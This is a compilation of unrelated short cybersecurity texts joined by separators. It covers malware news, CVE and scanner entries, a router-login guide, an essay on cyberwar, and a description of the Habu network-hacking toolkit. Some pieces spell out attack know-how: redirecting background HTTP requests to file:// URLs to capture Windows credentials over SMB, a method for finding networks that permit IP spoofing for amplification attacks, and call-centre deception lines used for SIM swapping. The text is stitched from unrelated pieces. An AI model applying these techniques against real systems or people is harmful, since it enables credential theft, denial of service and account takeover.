“Many software products use HTTP requests for various features such as software update checking. A malicious user can intercept such requests (such as with a MITM proxy) and use HTTP Redirect to redirect the victim a malicious SMB server. If the redirect is a file:// URL and the victim is running Microsoft Windows, Windows will automatically attempt to authenticate to the malicious SMB server by providing the victim’s user credentials to the server. These credentials can then be logged by the malicious server. The credentials are encrypted, but may be “brute-forced” to break the encryption,” the CERT advisory says.
Microsoft has not released a patch for this vulnerability. Researchers say that the attack technique developed by Cylance can make exploitation of the vulnerability much simpler.
“This is a novel attack that can be easily abused to significantly increase the exploitability of Windows client systems communicating on untrusted or compromised networks. While tools like KARMA, Metasploit, and Responder.py depend on the user to make a SMB connection back to the attacker, the Cylance research improves on the attack by abusing how HTTP redirects are handled by callers of the URLMon API,” said HD Moore, chief research officer at Rapid 7.
“The Cylance research shows that instead of waiting for the user to open their browser or manually connect to a network share, an attacker can look for automated HTTP requests sent by background applications and redirect these to file:// URLs, triggering a SMB connection and automatic authentication. Given how many applications a typical laptop or tablet has running in the background, this can drastically speed up SMB capture and relay attacks against Windows-based laptops and tablets connecting to insecure wireless networks.
“On a Windows 8.1 laptop, at least 50 different HTTP connections were made after a restart and within 5 minutes, most of which could be hijacked by a network-local attacker to force SMB authentication to a malicious service. The source of these connections ranged from OEM “update” checks to weather and news applications.”
One potential use for this vulnerability could be as part of a multi-stage attack.
“I would expect this vulnerability to be used as part of a two-stage phishing attack: First try to exploit vulnerabilities, including this one, after getting the user to click a link in an email, and then attempt to do something further by getting the user to “log in” to a fake portal, or downloading software that takes over the machine. In this way, attackers can be moderately effective even if the user doesn’t fall for anything after opening the page,” said Patrick Nielsen, senior security researcher at Kaspersky Lab.
“The SMB authentication payload is interesting mainly to perform further attacks against a single target entity, and particularly if it’s lured out of a user with elevated access, like an Active Directory Operator.”
|
PPP with Challenge Handshake Authentication Protocol (CHAP) or Password Authentication Protocol (PAP) is often used to inform the central site about the remote devices that are connected to the site.
With this authentication information, if a device or an access server receives a packet for a destination to which the router or the access switch is already connected, an additional call is not placed. However, if the router or access server is using rotaries, the device or access server sends the packet out on the correct port.
CHAP and PAP were originally specified in RFC 1334, and CHAP is updated in RFC 1994. These protocols are supported on synchronous and asynchronous serial interfaces. When using CHAP or PAP authentication, each device or access server identifies itself using a
name. This identification process prevents a device from placing another call to a device to which it is already connected and also prevents unauthorized access.
Access control using CHAP or PAP is available on all serial interfaces that use PPP encapsulation. The authentication feature reduces the risk of security violations on your device or access server. You can configure either CHAP or PAP on a serial interface.
To enable CHAP or PAP authentication on a device, the device must be running PPP encapsulation.
When CHAP is enabled on an interface and a remote device attempts to connect to it, the local device or access server sends a CHAP packet to the remote device. The CHAP packet requests or “challenges” the remote device to respond. The challenge packet consists of an ID, a random number, and the host name of the local device.
The required response consists of the following two parts:
- An encrypted version of the ID, a secret password, and a random number
- Either the hostname of the remote device or the name of the user on the remote device
When the local device or access server receives the response, it verifies the secret password by performing the same encryption operation as indicated in the response and by looking up the required hostname or username. The secret passwords must be identical on the remote device and the local device.
Because this response is sent, the password is never sent in clear text, preventing other devices from stealing it and gaining illegal access to the system. Without a proper response, the remote device cannot connect to the local device.
CHAP transactions occur only when a link is established. The local device or access server does not request a password during the rest of the call. (The local device can, however, respond to such requests from other devices during a call.)
When PAP is enabled, the remote router attempting to connect to the local device or access server is required to send an authentication request. If the username and password specified in the authentication request are accepted, Cisco software sends an authentication acknowledgment.
After you have enabled CHAP or PAP, the local router or access server requires authentication from remote devices. If the remote device does not support the enabled protocol, no traffic is passed to that device.
|
Unfortunately, IP spoofing enables shitkids to have in the virtual world the leverage they don't have in real life, and I'm talking about DRDoS. Lately I've been involved in protecting the very same game that I hacked against this kind of attacks. And of course, since I live in a constant moral greyzone, I couldn't miss experimenting in the other side of the front.
What and HowPerforming IP spoofing requires a machine in an AS that allow such packets to be effectively sent out of its network. Finding one of these is no more a trivial task as it was years ago, and the knowledge of which providers allow that is usually not accessible for free. There are some places where you can find the worst scum of internet, and rent services from these fishy individuals, but it's usually a very unpleasing experience if you are there just for the sake of knowledge. So I started thinking how I could harvest for this kind of AS.
My idea is pretty simple:
- pick a protocol that causes one query packet to be answered with an answer with controllable payload
- force the above-mentioned payload to be the destination IP (the "visible global IP" of the host) of the query packet
- inspect the response and check for weird mismatches between the payload and the source address.
ImplementationFirst guess for the protocol? ICMP ping. Universal, reliable as the query payload is transmitted back as is, and generally not filtered.
I wrote my own simple C++ program that pings the internet in a pseudo random order, so that a single target network doesn't get a sudden spike of traffic (just like other tools do), and the result gathering was just tcpdump and some awkward bash scripts. I'm not going to share the code because I don't want lamers to gain from my ideas without effort, and also because I simply lost it. I decided to limit the results to host that sent non-globally routable source addresses, as there is no chance to incur in false positives: a simple mismatch of the payload and the source address is most probably caused by bad connection tracking and hosts with multiple network interfaces.
If you attempt to reproduce these results, be aware of two things. First you'll get abuse complaints, even for a ping scan, that has had no known vulnerabilities in the last 30 years I think. American university networks seem to be the most hysterical, and I would like to have a word about that in another future
ResultsHere is a plot of the raw number of hits for reserved IP classes.
One remarkable thing is the complete lack of 127.0.0.0/8, which every host should have attached to the loopback interface. In my opinion, this is due to the fact that a packet with this source address would need to be originated from the loopback interface, and at least the linux kernel seems to have hardcoded behaviors that make the packet "stick" to the interface (that is even policy based routing is ignored and the packet is directly looped to the host).
I'm not going to provide the raw capture files, so don't bother asking.
|
Due to the popularity of file hosting service Dropbox, it is no surprise that cybercriminals leverage this platform to proliferate their malicious activities. We recently spotted a spam run that purports as an eFax notification mail. Users are encouraged to view the fax message by clicking a link. Once clicked, the URL goes to a legitimate Dropbox site which downloads a .ZIP file, containing a malicious .EXE file detected as TROJ_UPATRE. Once users execute this malware, it downloads a variant of NECURS, which is known for disabling security software features of infected system.
UPATRE variants are known downloaders of ZeuS malware. These are commonly seen as email attachments. What is notable in this spam attack is this is the first instance we saw TROJ_UPATRE being deployed via URL found in email message. Typically, this malware arrives as attachment to spammed messages.
Similarly, another spam run pretends as Natwest Financial Activity Statement email containing a Dropbox link. However, instead of downloading a supposed financial file, users get a malware also detected as TROJ_UPATRE. Lastly, a spammed email contains a Dropbox link, which has an embedded link that leads to Canadian pharmacy website.
Trend Micro protects users from these several spam runs via its Smart Protection Network that detects the spam and malicious file. Users are strongly advised to check first the validity of any email they received before opening any emails from unknown sources.
|
Warlike acts in the cyber domain
One paragraph in particular caught my eye:
To complicate matters, having cyber insurance might not cover everyone’s losses. Zurich American Insurance Company refused to pay out a $100 million claim from Mondelez, saying that since the U.S. and other governments labeled the NotPetya attack as an action by the Russian military their claim was excluded under the “hostile or warlike action in time of peace or war” exemption.
You can read the official U.S. press release here . What interests me is not just the small letters of insurances policies, although they can have huge financial consequences for companies in this case. Philosophically and politically, the more interesting question is what constitutes an act of war in the cyber domain. In this scenario, insurance money is paid based on whether the cyber attack is considered a warlike act or not. The phrasing “warlike action in time of peace or war” anticipates a difference between such warlike attacks and “actual” war, as these “warlike” acts do not have to take place during war time.
Traditionally, wars occur between two nations that are identifiable. If they play fairly, they can even officially declare war before knocking on someone’s door. It is important that these parties are identifiable, so that they can be held accountable in terms of the Geneva Conventions for example. However, in the case of cyberattacks, there can be significantly more ambiguity concerning the identity of the attacker.
Take for example a well known cyberattack on DigiNotar, a certificate authority in the Netherlands (for public key encryption). Due to a hack fake certificates had been issued, compromising the trustworthiness of DigiNotar certificates, resulting in the removal of these certificates for example from all major browsers. To complicate matters, the Dutch government internally used many DigiNotar issued intermediary certificates that chained up to the Dutch government CA itself (see for example Firefox’ communication about this . The DigiNotar certificates becoming untrusted consequentially threatened to destabilize the Dutch government, as official services such as the tax system and the online ID management system for Dutch citizens (DigID) that is used to access government services threatened to become inaccessible. In other words, the hack was a threat to the stability of the Dutch state. Is this a warlike act? Or is it an act of war?
Interestingly a presumably Iranian hacker claimed the attack here and stated that his motivation was political: revenge for the Srebrenica massacre the part the Dutch government played in it. It seems then that destabilizing the Dutch government was not just a side-effect, but a direct target of the attack. One can wonder how convincing is it that such a young person would successfully perform a hack on a major certificate authority all by himself. Especially when one hypothesizes about government involvement and if one takes into account that the target of the attack was announced to be the Dutch government, then this attack can potentially be interpreted as an act of war.
The following quote from here argues against jumping to such conclusions:
“Security expert Robert Graham, who’s swapped e-mails with Ich Sun and ultimately confirmed that he was indeed the one who pulled off the Comodo hack, thinks otherwise. He accuses Comodo and reporters who have covered this story of jumping to conclusions about the Iran connection. “We make the assumption that anyone who supports the government there works for the government and that’s just not true,” said Graham, CEO of Errata Security. “My theory is he’s exactly what he says he is. That’s what the evidence points to. There’s no evidence that says he would have to be part of a state-sponsored effort. The attack is not that complex. It’s just what your average pen-tester would do.”
Interestingly, the later investigation report by Fox-IT which can be downloaded here from a Dutch government website showed that “Around 300.000 unique requesting IPs to google.com have been identified. Of these IPs >99% originated from Iran” (p. 8). It turned out that practically all victims of the attack on a Dutch certificate authority where in fact Iranian gmail users. The target then was not the Dutch government after all. The Dutch certificates were used for a massive man-in-the-middle attack on Iranian civilians.
The take-away is that calling something an act of war in the cyber domain is to some extent a matter of interpretation as the relevant actors become increasingly less identifiable. That act of interpretation however has huge potential consequences. In the context of the cited article those consequences are mostly economical for companies whose damages might not be covered by their insurance. But the potential political consequences are the most worrisome. As digital systems become more interwoven with essential infrastructures and with other digital systems, warfare will also become increasingly digital. In accordance, those with the knowledge and capabilities to work and influence computer systems de facto have political power. And when the relevant parties of “warlike” acts in the digital domain cannot be identified anymore as government parties, the distinction between war and terrorism blurs, as the distinction heavily relies on the violence of the former being warranted by a nation, whereas that of the latter is against a state or nation.
This made me remember a reflection of Derrida on how technoscience blurs the rigorous distinction between war and terrorism, in a book I have read about five years ago (it made an impression apparently). I looked it up again. The following passage is from the book “Philosophy in a Time of Terror” (2003) by Giovanna Borradori. In the words of Jacques Derrida:
No geography, no “territorial” determination, is thus pertinent any longer for locating the seat of these new technolgies of transmission or aggression. To say it all too quickly and in passing, to amplify and clarify just a bit what I said earlier about an absolute threat whose origin is anonymous and not related to any state, such “terrorist” attacks already no longer need planes, bombs, or kamikazes: it is enough to infiltrate a strategically important computer system and introduce a virus or some other disruptive element to paralyze the economic, military, and political resources of an entire country or continent. And this can be attempted from just about anywhere on earth, at very little expense and with minimal means. The relationship between earth, terra, territory, and terror has changed, and it is necessary to know that this is because of knowledge, that is, because of technoscience. It is technoscience that blurs the distinction between war and terrorism. (p. 101)
|
BurpSuite has a scanner builtin that allows you to scan a URL or URLs and this will give you an output of what is vulnerabilities or misconfigurations are set. A simple thing may be the SSL certificate on your Exchange server, while you may think this is not significant, this can be leveraged in an attack as it is a weak point.
Let’s look at this example against my Exchange 2019 server. The scan revealed multiple issues but the SSL certificate one is what is highlighted below:
The image is is large so it has a lot of content but on the right hand side, you can see under the Advisory section, it lists the issue and below that also lists the vulnerability classifications:
Other issues highlighted on Exchange Server 2019 is shown below:
You can see that there are a number of items that BurpSuite picked up and you can drill into each to understand what it means and how to resolve it. BurpSuite actually provides you with an “Issue Remediation” section on some of the items. The TLS Certificate ones should be self explanatory, meaning you need to ensure that the SSL certificate you are using is valid, has not expired etc.
If you have access to the tools, run it against your site, remember you should only scan what you are allowed to and have been given permission to, hence me showing you my lab as I am the owner of the lab.
The exploits on my other blogs are carried out against my lab machines. Everything you do also creates a lot of noise, so if you doing this in your company after getting permission, inform the SOC team or Security Team what you doing so they do not think an attack is being carried out.
Hope it helps.
|
Security researchers have discovered a new backdoor called WhiskerSpy being used in a campaign by a relatively new advanced threat actor being tracked as Earth Kitsune, known to target individuals showing an interest in North Korea.
The actor used a tried-and-true method and picked victims from visitors to a professional North Korean website, a tactic known as the waterhole attack.
The new operation was uncovered late last year by researchers from cybersecurity firm Trend Micro, who have been tracking Earth Kitsune activity since 2019.
Attack at the watering hole
According to Trend Micro, WhiskerSpy was delivered when visitors tried to watch videos on the website. The attacker compromised the website and injected a malicious script that required the victim to install a video codec for the media to play.
To avoid suspicion, the threat actor modified a legitimate codec installer to eventually load “a previously invisible backdoor” onto the victim’s system.
The researchers claim that the threat actor only targeted website visitors with IP addresses from Shenyang, China; Nagoya, Japan; and Brazil.
It is likely that Brazil was only used to test the waterhole attack using a VPN connection and that the real targets were visitors from both cities in China and Japan. Affected victims would receive the fake error message below which prompts them to install a codec to watch the video.
In reality, the codec is an MSI executable that installs on the victim’s computer shellcode that triggers a series of PowerShell commands that lead to the deployment of the WhiskerSpy backdoor.
THE researchers note this persistence technique used by Earth Kitsune in this campaign abuses the native Google Chrome mail host and installs a malicious Google Chrome extension called Google Chrome Helper.
The role of the extension is to allow the execution of the payload each time the browser is started.
The other method to achieve persistence is to take advantage of OneDrive’s sideloading vulnerabilities that allow a malicious file (fake “vcruntime140.dll”) to be dropped into the OneDrive directory.
Details of WhiskerSpy
WhiskerSpy is the main payload used in the latest “Earth Kitsune” campaign, providing remote operators with the following features:
- interactive shell
- download a file
- upload a file
- delete file
- list files
- take a screenshot
- load the executable and call its export
- inject shellcode into a process
The backdoor communicates with the command and control server (C2) using a 16-byte AES key for encryption.
WhiskerSpy periodically connects to C2 for updates on its status and the server can respond with instructions for the malware, such as running shell commands, injecting code into another process, exfiltrating specific files, taking screenshots of screen.
Trend Micro discovered an earlier version of WhiskerSpy that uses FTP protocol instead of HTTP for C2 communication. This old variant also checks for the presence of a debugger at runtime and notifies the C2 with the appropriate status code.
Note, the confidence of the researchers in the attribution of this watering hole attack to Earth Kitsune is medium but the modus operandi and the targets are similar to the activities previously associated to the group.
|
Skulls.AF is a malicious SIS file trojan that will replace the system applications with non-functional versions, so that all but the phone functionality will be disabled. If Skulls is installed it will cause all application icons to be replaced with pictures of skulls, and the icons don't refer to the actual applications any more so none of the Phone System applications will be able to start.
Use F-Skulls to allow for installation of F-Secure Mobile Anti-Virus
Install F-Secure Mobile Anti-Virus
CAUTION! this method will remove all data on the device including calendar and phone numbers:
Prevent future infections with F-Secure Mobile Security
Skulls.AF is a SIS file that installs critical System ROM binaries and Cabir.F and Cabir.G worms onto the C: drive. The System ROM files are installed with exactly the same names and locations as in the ROM drive.
The Symbian operating system has a feature which causes any file that is in the C: drive to replace the file in the ROM drive with an identical name and location.
Replaces built in applications with non-functional ones and installs Cabir.F and Cabir.G worms.
F-Secure Mobile Anti-Virus for Symbian detects this malware starting from the update build number 11.
|
Zeus , ZeuS or Zbot is a Trojan that performs a function in the background without the knowledge of the user. It is mainly used to spy out financial and private data, for example by logging keyboard entries in the browser, but it can also install other malicious programs . The number of computers infected with Zeus was sometimes in the tens of millions. Zeus was involved in the theft of hundreds of millions of dollars .
Zeus attacks computers that use Windows as their operating system. The majority of the infection occurs through drive-by download , i. H. through unconscious and unintentional downloading of software onto a user's computer, or through spam campaigns. Zeus contacts a control server, via which he receives instructions for further actions.
Zeus was first discovered in July 2007 in an attack on the US Department of Transportation . In early 2009 it was announced that Zeus access to over 74,000 FTP - user accounts had, including such well-known companies such as Bank of America , NASA , Monster.com , ABC , Oracle , Cisco , Amazon and Business Week .
- Trojan.Zbot . Symantec, (updated) October 15, 2014 (English)
- The Big Four Banking Trojans . Kaspersky Lab Daily, October 21, 2013
- Zeus Trojans: A hacker turns the tables . Heise Security, August 8, 2014
- Steve Ragan: ZBot data dump discovered with over 74,000 FTP credentials . The Tech Herald, January 29, 2009 (English)
|
2021-21820 | D-Link DIR-3040 Libcli Test Environment hard-coded password (TALOS-2021-1285)
|CVSS Meta Temp Score
CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.
|Current Exploit Price (≈)
Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.
|CTI Interest Score
Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.
A vulnerability, which was classified as critical, has been found in D-Link DIR-3040 1.13B03 (Router Operating System). Affected by this issue is some unknown processing of the component Libcli Test Environment. The manipulation with an unknown input leads to a weak authentication vulnerability. Using CWE to declare the problem leads to CWE-259. Impacted is confidentiality, integrity, and availability. CVE summarizes:
A hard-coded password vulnerability exists in the Libcli Test Environment functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to code execution. An attacker can send a sequence of requests to trigger this vulnerability.
The weakness was shared 07/16/2021 as TALOS-2021-1285. The advisory is available at talosintelligence.com. This vulnerability is handled as CVE-2021-21820 since 01/04/2021. The exploitation is known to be easy. The attack may be launched remotely. No form of authentication is required for exploitation. The technical details are unknown and an exploit is not available. The structure of the vulnerability defines a possible price range of USD $5k-$25k at the moment (estimation calculated on 07/19/2021).
There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.
VulDB Meta Base Score: 7.3
VulDB Meta Temp Score: 7.1
Status: Not defined
0-Day Time: 🔒
Status: Not defined
Use the official API to access entries easily!
|
Unrestricted File Upload
Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.
The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
|
This script is Copyright (C) 2011-2014 Tenable Network Security, Inc.
The remote Gentoo host is missing one or more security-related
The remote host is affected by the vulnerability described in GLSA-201111-03
(OpenTTD: Multiple vulnerabilities)
Multiple vulnerabilities have been discovered in OpenTTD. Please review
the CVE identifiers referenced below for details.
A remote attacker could execute arbitrary code with the privileges of
the OpenTTD process or cause a Denial of Service. Local users could cause
a Denial of Service.
There is no known workaround at this time.
See also :
All OpenTTD users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=games-simulation/openttd-1.1.3'
NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since September 27, 2011. It is likely that your system is
already no longer affected by this issue.
Risk factor :
High / CVSS Base Score : 7.5
CVSS Temporal Score : 5.5
Public Exploit Available : false
|
10.0.1.1 – Admin Login, Username, Password, and IP – It’s the default login IP that is reserved for the different modems or wireless routers. With the user typing 10.0.1.1 in the address bar of the particular browser, the user will get access to the admin interface of their router. 10.0.1.1 is mostly used by brands like WatchGuard, Apple, or Motorola. It’s not the only standard IP for routers.
How to login to 10.0.1.1?
Follow these simple steps to log into the Router with a 10.0.1.1 IP address:
The user needs to Connect the router cable to their computer. The user should Double-check the device that they wish to work on is connected to the wi-fi.
Next, the user needs to Open their chosen web browser and type the router’s IP address in the address bar. The user can find it on the back of their router packaging. If the address fails, the user needs to get their router manual. The IP listed as the known Default Gateway is the correct one.
Not it is the time to enter the default username and password of the router by accessing the admin panel.
If none of the above are successful, then the user can type their router’s name into their browser to locate the default login username and password that the user needs. The user should be directed to the models’ configuration page where the network and the router settings can be managed.
How To Configure the Router With 10.0.1.1?
Here are the steps listed:
- There is a lot that the user can do on this menu, though for someone accessing the router interface for the first time, it’s a good idea to stick to the basics.
- Firstly, Once the user has gone through the steps above, they will have access to their router’s interface. Once they are on the main menu, the user needs to search for the general settings or admin settings menu.
- Next, the user needs to Scroll through that menu until they find the router password field.
- Next, Once the user has found the correct field, they need to enter their desired password or username, depending on which one that they want to change. If they are changing their password, make sure that the new password is secure.
- As with any changes that the user makes to their router, always save once they have finished.
How To Change the Name and Password Of the user’s Wi-Fi Network?
- Once the user has changed the login details of their router’s interface, the next thing that the user might like to do is to set the login details of the router’s Wi-Fi network. To change the Wi-Fi network name, the user needs to change their SSID.
- Firstly, the user needs to Once more, go to the general settings or admin settings menu.
- Next, from that menu, the user needs to search for the wireless settings option.
- It is here that the user will find the SSID field. Here, the user needs to select the field and type in their desired Wi-Fi network name.
- Next, as before, the user needs to save their changes.
- Changing the Wi-Fi password follows similar steps. In place of selecting the SSID field, the user needs to select the Wi-Fi password field. Next, the user needs to Enter their desired password, and then they need to save their changes.
How To Find the user’s IP Address
for a computer running on Microsoft Windows:
- firstly, the user needs to Select the network symbol in the bottom right of their screen.
- Next, Once the user needs to open the menu, then the user needs to select the Wi-Fi network that they are using to access the internet.
- Next, after clicking on the Wi-Fi network, the user sees a list of information related to the network. One of those pieces of information will be the IPv4, which is the user’s IP address and looks similar to 10.0.1.1.
- For a computer running on MAC OS X:
- Firstly, the user needs to click on the Apple menu, which they will find in the top left of their screen.
- Next, with that menu open, the user needs to select the system preferences.
- Next, the user will have a selection of Wi-Fi networks, and the user should select the one that they use to access the internet.
- Alongside the word router, the user will find their IP address.
The IP address of one’s particular router doesn’t need to be unique as the only person who uses the IP address is the user, the owner of the network. As touched on above, the user router is not the only device that has an IP address. Every computer device on the network also has one.
Usually, it is some derivation of 10.0.1.1, with the last number changing, depending on how many devices that the user has connected to the network.
Related Tags: 10.0.1.1
|
Backdoor attacks are a cyber threat where attackers bypass standard authentication or encryption processes to gain unauthorized access to a system. These attacks often remain undetected, allowing attackers to exploit software vulnerabilities, install malicious programs, or modify device hardware or firmware to create a backdoor. Once a backdoor is in place, cybercriminals can gain complete control of the targeted system or network, steal data, install malware, spy on users, or cause damage in various ways.
Backdoor attacks can be hazardous because they can go unnoticed and become difficult to remove. Furthermore, they can lead to various other types of attacks, such as DDoS attacks, ransomware attacks, and crypto-jacking attacks. The bottom line is to be knowledgeable about different types of backdoors, as it is an essential first defense and strategy to prevent them from occurring.
ProPump and Controls recently uncovered multiple flaws in the Osprey Pump Controller, a water pumping system. Backdoor access was one of the significant vulnerabilities, among others. CISA has also issued an advisory concerning this threat.
There are two main types of backdoors: Administrative Backdoors and Malicious Backdoors.
Developers or administrators intentionally create administrative backdoors for legitimate purposes, such as testing, debugging, or maintenance. They can be hidden features or commands in a software application that allow privileged access to the code or data without going through the normal login process. However, these backdoors can pose a security risk if discovered or hackers obtain their credentials. In such cases, backdoors can be exploited to gain unauthorized access to the system. As such, it is crucial to consider administrative backdoors as security vulnerabilities that require prompt resolution after their intended use.
Hackers intentionally create malicious backdoors for illicit purposes, such as gaining unauthorized access to a system or network and carrying out harmful activities. For instance, an attacker may use a malware program, like a remote access trojan (RAT), to infect a system and create a backdoor to control the system from a remote location. Malicious backdoors are security breaches that need to be identified and eliminated as soon as possible.
Most global backdoor attempts failed as defenders detected them before the ransomware was deployed. There are several ways to prevent backdoor attacks from happening to you or your organization, such as:
Backdoor attacks are among the most common and dangerous types of cyberattacks that can compromise the security of your system or network. Understanding the different types of backdoors and how they work can help you take preventive measures to protect yourself and your organization from these threats.
Following these steps can reduce the chances of becoming a victim of a backdoor attack:
|
habu v0.0.70 released: Python Network Hacking Toolkit
Habu: Python Network Hacking Toolkit
I’m developing Habu to teach (and learn) some concepts about Python and Network Hacking.
These are basic functions that help with some tasks for Ethical Hacking and Penetration Testing.
Most of them are related to networking, and the implementations are intended to be understandable for who wants to read the source code and learn from that.
Some techniques implemented in the current version are:
- ARP Poisoning
- ARP Sniffing
- DHCP Discover
- DHCP Starvation
- Land Attack
- SNMP Cracking
- SYN Flooding
- TCP Flags Analysis
- TCP ISN Analysis
- TCP Port Scan
- Web Technologies Identification
- new habu.asydns command
- new command: habu.virustotal
new command: habu.shodan (shodan api client)
$ pip3 install habu
habu.arpoison: ARP Poisoning
This command sends ARP ‘is-at’ packets to each victim, poisoning their ARP tables for sending the traffic to your system.
Note: If you want a full working Man In The Middle attack, you need to enable the packet forwarding on your operating system to act as a router. You can do that using:
habu.arpsniff: Discover devices on your LAN capturing ARP packets
This command listens for ARP packets and shows information about each device.
Columns: Seconds from last packet | IP | MAC | Vendor
habu.contest: Check your connection capabilities
This command tries to connect to various services and check if you can reach them using your internet connection.
habu.dhcp_discover: Discover DHCP servers
This command sends a DHCP request and shows what devices have replied. Using the ‘-v’ parameter (verbose) you can see all the options (like DNS servers) included in the responses.
habu.dhcp_starvation: Fill the DHCP leases
This command sends multiple DHCP requests from forged MAC addresses to fill the DHCP server leases. When all the available network addresses are assigned, the DHCP server doesn’t send responses. So, some attacks, like DHCP spoofing can be made.
habu.eicar: Prints the EICAR test string
This command prints the EICAR test string that can be used to test antimalware engines. More info: http://www.eicar.org/86-0-Intended-use.html
Copyright (c) 2018, Fabian Martinez Portantier
All rights reserved.
|
Following on the footsteps of other destructive disk-wiping malware attacks, ESET researchers have also discovered a second wiper malware dubbed IsaacWiper targeting governmental networks in Ukraine.
Securezoo Cybersecurity Threat Center blog posts of malware threats.
Sandworm threat actors, also known as Voodoo Bear, are now using a new malware dubbed Cyclops Blink, a replacement for VPNFilter malware previously exposed in 2018, to target small office/home office (SOHO) routers and network attached storage (NAS) devices.
Researchers from Proofpoint have spotted an advanced persistent threat actor (APT) dubbed TA2541 that has been targeting entities in the aviation industry to distribute AsyncRAT malware.
The Federal Bureau of Investigation (FBI) and the U.S. Secret Service (USSS) issued a joint Cybersecurity Advisory warning of BlackByte ransomware compromising multiple entities in US critical infrastructure sectors.
Researchers from Akamai Threat Labs have discovered cyber activity involving the sophisticated peer-to-peer (P2P) botnet FritzFrog has resurfaced in late 2021.
The Federal Bureau of Investigation (FBI) has released new Indicators of Compromise (IoC) details on Lockbit ransomware-as-a-service (RaaS).
Microsoft shared new information on cyber threat group dubbed ACTINIUM (also known as Gamaredon) that has been targeting organizations in Ukraine or those related to Ukrainian affairs. The cyber activity is also tracked back to DEV-0157.
|
You would be wise not to visit Japanese websites at present as security researchers from Symantec discovered a persistent spear phishing attack perpetrated by a group of hackers calling themselves Tick.
Using a tailor-made malware called Daserf, the hackers appeared to have begun their operations more than a decade ago but has kept their profile hidden from most security vendors, thus the longstanding attack Symantec classified under the cyber espionage category. The victims include the technology, aquatic engineering, and mass media sectors of the country.
How did the group manage to hit their victims? According to researchers at Symantec, Tick set out by sending spear-phishing emails that contain harmful links and attachments intended to expand the number of its victims. The group is also said to employ a variety of tools designed to spy on the network of a victim organization and expand its access through privilege escalation tactics.
The goal is to pilfer information from the compromised machines and a Trojan that comes with the attack works to transmit stolen data to the command and control server managed by the Tick group. The Daserf malware would try to open a backdoor access for the attackers to infect the target organization’s network via a remote connection to the hacker-controlled servers.
Once installed in a machine, the malware would create an install directory where the hackers would deploy several hacktools like Mimikatz, GSecdump, and Windows Credential Editor to escalate their privilege deeper into the network. Based on the results of a forensics investigation conducted by Symantec, the attackers have managed to steal crucial data in the form of PowerPoint presentations from various organizations in Japan.
Like most advanced persistent threats, the Daserf Trojan has been keeping a low profile to prevent antivirus tools from detecting its operations. It works to protect stolen information in .rar files protected by passwords and employs file names that borrows its legitimate appearance from existing programs installed in Windows computers such as Intel, Adobe and other file logs.
Symantec said it has been trying to determine the command and control domains used by Tick to spread the malware. But because the hackers employ domain brokers oftentimes, the registration information of those domains cannot be identified. The malware examined by security researchers do not appear to be digitally signed, though some were signed using stolen digital certificate.
Tick seems to get enough funding to advance its capabilities to conduct cyber espionage, thus it is a well-organized group, or state sponsored.
|
U.S. Wireless carriers are coming under heavy fire for failing to protect their users from the practice of SIM hijacking. The practice usually involves conning or bribing a wireless employee to port a victim’s cell phone number right out from underneath them, letting the attacker then pose as the customer to potentially devastating effect. Carriers are facing numerous lawsuits from victims who say attackers used the trick to first steal their identity, then millions in cryptocurrency, or even popular social media accounts.
Last week, six lawmakers, including Ron Wyden, wrote to the FCC to complain the agency isn’t doing enough (read: anything) to pressure carriers into shoring up their flimsy security. This week, a group of Princeton researchers released a study showcasing how both traditional and prepaid wireless carriers remain incredibly vulnerable to such attacks despite several years worth of headlines. In the full study (pdf, hat tip ZDNet), the researchers showed how it was relatively easy to trick wireless company support employees into turning over far more private data than they should, helping to facilitate the illicit SIM swap:
“When providing incorrect answers to personal questions such as date of birth or billing ZIP code, [research assistants] would explain that they had been careless at signup, possibly having provided incorrect information, and could not recall the information they had used,” researchers said, explaining the motives they provided to call center staff.”
After failing the first two steps in confirming a caller’s identity, wireless carriers then move on to a third confirmation option — verifying the last two numbers called from the account. But researchers note that was easy to game as well:
“The research team says that an attacker could trick a victim into placing calls to specific numbers. For example, a scenario of “you won a prize; call here; sorry, wrong number; call here instead.” After the attacker has tricked the SIM card owner into placing those two calls, they can use these details to call the telco’s call center and carry out a SIM swap. Princeton researchers said they were able to trick all five US prepaid wireless carriers using this scenario.”
Despite warning all five of the carriers they tested this trick on, four of the five still hadn’t fixed their security gaps as of the study’s publication. After showcasing how vulnerable mobile carriers are, the researchers took a closer look at what could be done once they had taken over a user’s wireless accounts. As such they tested the multi-factor-authentication practices of 140 of the most popular services and sites, and found that 17 of those services had no systems in place to protect users from SIM hijacking (such as emailing users a one time password to confirm identity and verify the changes were actually requested).
Here’s where, in a functional market with a functioning government, regulators would step in to pressure carriers to do more to actually protect consumers. Instead, the Trump FCC has spent the last three years rubber stamping every fleeting whim of the sector, including gutting most meaningful oversight of the sector, and rubber stamping massive mergers the majority of objective experts say will harm the market.
Permalink | Comments | Email This Story
|
Sogu is a backdoor Trojan that may be used as a preliminary step between the initial infection of a PC and the installation of high-level threats, such as the PoisonIvy RAT. Because of their strong association with Axiom, a Chinese hacker organization, Sogu Trojans are significant security risks for government and business networks, with spearhead attacks disguised as 'safe' e-mail attachments. Removing Sogu, like any Trojan capable of creating backdoor vulnerabilities, should include the use of anti-malware tools that can delete all of its components and potentially threatening settings changes.
Fighting for Your Rights against a Sogu Trojan
Sogu is a Trojan sometimes deployed in targeted e-mail attacks against political rights activists, particularly in Asia. Also known by PlugX, Kaba, DestroyRAT, Thoper or Korplug, Sogu may provide general backdoor functions that could be used to install other threatening software, change your PC's security settings or run system commands. In these respects, Sogu is similar to other backdoor Trojans also associated with Axiom, such as Fexel or Naid. Distribution methods confirmed for Sogu also use one of Axiom's favored tactics: a threatening e-mail attachment.
